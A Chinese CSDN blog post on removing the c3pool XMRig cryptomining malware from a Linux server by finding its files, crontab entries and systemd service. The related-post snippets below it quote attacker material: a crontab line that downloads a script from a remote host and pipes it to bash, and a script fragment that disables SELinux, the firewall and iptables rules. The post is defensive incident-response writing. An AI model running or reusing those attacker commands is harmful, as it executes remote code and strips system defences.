清理linux上c3pool挖矿病毒xmrig

西米先生「软件工程师」

于 2024-04-25 14:53:48 发布

阅读量218

点赞数 4

文章标签： linux 运维服务器

本文链接：https://blog.csdn.net/sulei627719296/article/details/138189282

版权

查杀过程

查找病毒脚本位置

find / -name xmrig

检查是否有相关的定时任务，如果有定时任务则删除掉

crontab -l

find / -name cron* -type d

查找自启动服务

因为kill -9杀掉进程之后会立即重启，需找到自启动服务，禁用后删除

systemctl list-units --type=service

找到所有相关的服务，全部删除

find / -name c3pool_miner.service

# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service

最后将脚本文件删除

rm -rf /root/c3pool/

关注博主即可阅读全文

优惠劵

西米先生「软件工程师」

关注关注

4
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
1
评论
清理linux上c3pool挖矿病毒xmrig

因为kill -9杀掉进程之后会立即重启，需找到自启动服务，禁用后删除。检查是否有相关的定时任务，如果有定时任务则删除掉。找到所有相关的服务，全部删除。
复制链接

扫一扫

xmrig-v6.12.2-C3-linux-Static.tar.gz

08-02

rufus-3.14p.exe

服务器被植入挖矿病毒-xmrig

weixin_53299145的博客

09-24

1366

今天早晨登录宝塔面板发现服务器CPU占用率和内存都爆满了，赶紧检查一下服务器的进程使用top命令查看服务器的cpu和内存占用情况。

1 条评论您还未登录，请先登录后发表或查看评论

【安全】查杀linux上c3pool挖矿病毒xmrig

最新发布

飞的博客

04-15

1322

旷池提供的卸载脚本，可直接通过此脚本卸载，卸载后修改登录密码，关闭非必须开放的端口，然后观察一段时间是否还会重启即可。因为kill -9杀掉进程之后会立即重启，需找到自启动服务，禁用后删除。终端历史执行命令记录中的截图，可以看到病毒安装的脚本。进程ip：47.76.163.177 为美国IP，kill -9 杀掉之后自动重启。找到所有相关的服务，全部删除。如果有定时任务则删除掉。高cpu和高内存占用。

Linux常见试题解析-b64_c3VuJTIwYm95-it720.pdf

11-29

Linux 学习必备

基于手机版本的xmrig执行文件

11-02

基于手机版本的xmrig执行文件

C3P0 DataSource Pool

07-26

NULL 博文链接：https://taink.iteye.com/blog/654632

xmrig挖矿病毒导致Postgresql数据库掉线

kite99的博客

04-18

1131

xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。

记录一次腾讯云木马攻击

wenzhenyu1990的专栏

05-24

972

客户服务运行越来越慢，今天居然挂了，上服务去看free -h 发现服务器内存消耗巨大，top查看果然xmrig以及.libs进程消耗掉了大部分cpu和内存。直接kill发现还是会继续存在于是执行crontab -l 发现 30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh 下载 http://w.apacheo...

一次服务器被入侵的处理过程分享

「虚幻私塾」

08-31

491

在 Linux 操作系统的动态链接库加载过程中，动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容，并将读取到的动态链接库进行预加载，即使程序不依赖这些动态链接库，LD_PRELOAD 环境变量和 /etc/ld.so.preload 配置文件中指定的动态链接库依然会被装载，它们的优先级比 LD_LIBRARY_PATH 环境变量所定义的链接库查找路径的文件优先级要高，所以能够提前于用户调用的动态库载入。，我在生活和现实面前低头了。...

清除xmrig病毒手记

gr13811787801的博客

05-25

7663

起因：2021-05-20日和21日公司的阿里云服务器发出报警提醒，有异常登录，由于外出工作没有及时查看和处理，直到21日下午查看时发现是有人暴力破解了服务器密码并成功登陆，这使我很震惊，毕竟阿里云也是有一定防护措施的，我们的密码也是随机生成的，得佩服一下这个黑客。登录的ip是两个国外地址，一个是新加坡（54.179.10.190）另外一个是博阿努瓦（51.222.40.232），赶紧对这两个ip进行拒绝登陆，可气的是这厮竟然修改了我的阿里云服务器的root登录密码，我不知道这个是怎么做到的，毕竟阿里云的r

c3p0 jar包及xml文件

08-28

用于连接池,里面有xml文件,c3p0的jar包和pool的jar包

linux 被攻击了，重装系统修改密码了也还是经常复发，咋整

qq_42622763的博客

08-24

660

#!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/dev/null ulimit -n 65535 ufw disable iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT iptables -F echo "vm.nr_hugepages=$((1168+$(nproc)))" | t.

记录一次服务器被拿去挖矿的经历

努力就有收获

10-20

2051

服务器被刷了？最近阿里云总是提示各种风险，只是简单处理，没太在意。今天想读取服务器的一个静态文件，总是失败，偶尔成功一两次，连接阿里云服务器也总是挂，一度怀疑公司网络的问题，然后通过远程打包的时候也挂了一次，说明肯定是服务器有问题了。回家发现是 Yapi 的一个漏洞导致会被挖矿，于是赶紧禁用 Yapi 的相关服务。怀疑可能有残留文件，那就得好好查查。首先根据阿里云报警信息里面的文件路径排查，该删除的删除。 1. 排查到一例：根据这个地址排查到，这是猫池，进而得到他的偷窃钱包地址。猫池地址：h

【安全】查杀linux挖矿病毒 kswapd0

飞的博客

04-11

1393

按照腾讯云报道，此次攻击为“亡命徒（Outlaw）僵尸网络”该僵尸网络最早于2018年被发现，其主要特征为通过SSH爆破攻击目标系统，同时传播基于Perl的Shellbot和门罗币挖矿木马。高cpu占用，使用top命令查看cpu使用率长时间50%以上，cpu占用异常的进程八成就是挖矿病毒进程。此病毒隐藏了自己，top命令无法查看到挖矿病毒进程，可通过sysdig命令找到隐藏进程。注意，该进程有子进程spamd child，需要一同清理，否则会再次重启。同时检查如下目录，将可疑文件清理掉。

服务器被入侵怎么办？看我操作！

weixin_44421461的博客

10-18

591

点击上方“Java基基”，选择“设为星标”做积极的人，而不是积极废人！每天14:00更新文章，每天掉亿点点头发...源码精品专栏原创 | Java 2021超神之路，很肝~中文详细注释的开源项目RPC 框架 Dubbo 源码解析网络应用框架 Netty 源码解析消息中间件 RocketMQ 源码解析数据库中间件 Sharding-JDBC 和 MyCAT 源码解析作业调度中间件 Elast...

xmrig挖矿病毒解决

热门推荐

yuguang的博客

11-20

1万+

1、问题排查显示 1.1服务器中情况 1.2后台查看情况 2、查看进程 [root@ecs-44a1 cron]# ll /proc/8236/exe lrwxrwxrwx 1 root root 0 Nov 20 10:52 /proc/8236/exe -> /etc/c3pool/xmrig [root@ecs-44a1 cron]# 3、查看进程文件 [root@ecs-44a1 cron]# ll /pr...

阿里云中了挖矿病毒；nexus-3.9.0-01:/service/extdirect漏洞；ldr.sh；sysrv、network01

小狮子的博客

01-23

2921

先描述下我的问题。阿里云一直短信加邮件提示“...服务器因被攻击限制访问部分IP及端口...” 看图：方便复制搜索 Web应用威胁检测-疑似成功的Web攻击已手工处理高级威胁检测模型备注该告警由如下引擎检测发现：请求时间: 2021-01-19 06:05:22 攻击者IP: 34.66.235.248 Host: ---------:8081 URI: /service/extdirect Content_type: application/json;charset=utf-.

find / -name xmrig

08-27

"find / -name xmrig"是一个Linux命令，用于在文件系统中搜索文件名为"xmrig"的文件。根据引用，这个命令在服务器的根目录下搜索名为"xmrig"的文件，并返回了"/root/.c3pool/xmrig --config=/root/.c3pool/config.json"作为结果。这表示在"/root/.c3pool/"目录下有一个名为"xmrig"的文件，并且还提供了一个配置文件的路径。123 #### 引用[.reference_title] - *1* [linux服务器挖矿程序xmrig入侵以及解决方案](https://blog.csdn.net/weixin_46575363/article/details/120083375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Linux服务器清除xmrig挖矿病毒详细教程](https://blog.csdn.net/cdooow/article/details/127693901)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交